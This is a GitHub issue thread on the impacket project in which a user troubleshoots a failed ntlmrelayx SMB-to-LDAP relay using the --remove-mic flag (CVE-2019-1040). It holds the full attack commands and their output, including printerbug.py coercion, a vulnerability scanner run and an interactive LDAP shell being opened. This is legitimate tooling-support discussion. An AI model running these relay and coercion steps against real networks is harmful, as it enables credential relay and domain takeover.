search

fortra / impacket

Impacket is a collection of Python classes for working with network protocols.
https://www.coresecurity.com
Other
13.47k stars 3.57k forks source link

ntlmrelayx SMB to LDAP remove-mic and CVE-2019-1040 #1222

Open s0i37 opened 2 years ago

s0i37 commented 2 years ago

Configuration

impacket version: 0.9.24 Python version: Python 3.9.2 Target OS: Kali GNU/Linux Rolling x64

Debug Output With Command String

sudo ntlmrelayx.py -t ldap://10.0.0.10 --remove-mic -i -debug
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Setting up WCF Server
[*] Servers started, waiting for connections

[*] SMBD-Thread-4: Connection from CORP/CRM2016$@10.0.0.100 controlled, attacking target ldap://10.0.0.10
[-] Authenticating against ldap://10.0.0.10 as USSC/CRM2016$ FAILED
[*] SMBD-Thread-5: Connection from /@10.0.0.100 controlled, attacking target ldap://10.0.0.10
[*] Authenticating against ldap://10.0.0.10 as / SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000
[+] No more targets for user /
[*] SMBD-Thread-5: Connection from /@10.0.0.100 controlled, but there are no more targets left!

So, relay SMB->LDAP doesn't work.

Additional context

python scan.py 'corp.org/user'@10.0.0.100
[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
Password:
[*] Target 10.0.0.100 is VULNERABLE to CVE-2019-1040 (authentication was accepted)
python printerbug.py 'corp.org/user'@10.0.0.100 10.0.0.200
[*] Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
[*] Attempting to trigger authentication via rprn RPC at 10.0.0.100
[*] Bind OK
[*] Got handle
The NETBIOS connection with the remote host timed out.
[*] Triggered RPC backconnect, this may or may not have worked
[-] [Errno 104] Connection reset by peer
jagotu commented 2 years ago

One thing that immediately stands out are these two lines:

[*] SMBD-Thread-4: Connection from CORP/CRM2016$@10.0.0.100 controlled, attacking target ldap://10.0.0.10
[-] Authenticating against ldap://10.0.0.10 as USSC/CRM2016$ FAILED

It seems it's trying to authenticate as USSC/CRM2016$ using creds for CORP/CRM2016$. Any idea where the USSC might come from?

s0i37 commented 2 years ago

No no. My mistake. USSC=CORP. I just manual replace it.

0xdeaddood commented 2 years ago

Hi @s0i37! Do you have a packet capture?

Thanks!

s0i37 commented 2 years ago

Unfortunately I cant provide packet capture by security reason. Probably you can understand the reason by pictures. 1-printerbug

2-smb

3-ldap

sho-luv commented 1 year ago

I have the opposite problem. CVE-2019-1040 scanner says it's not vulnerable, however --remove-mic was successful.

s0i37 commented 1 year ago

Probably it was NetNTLMv1?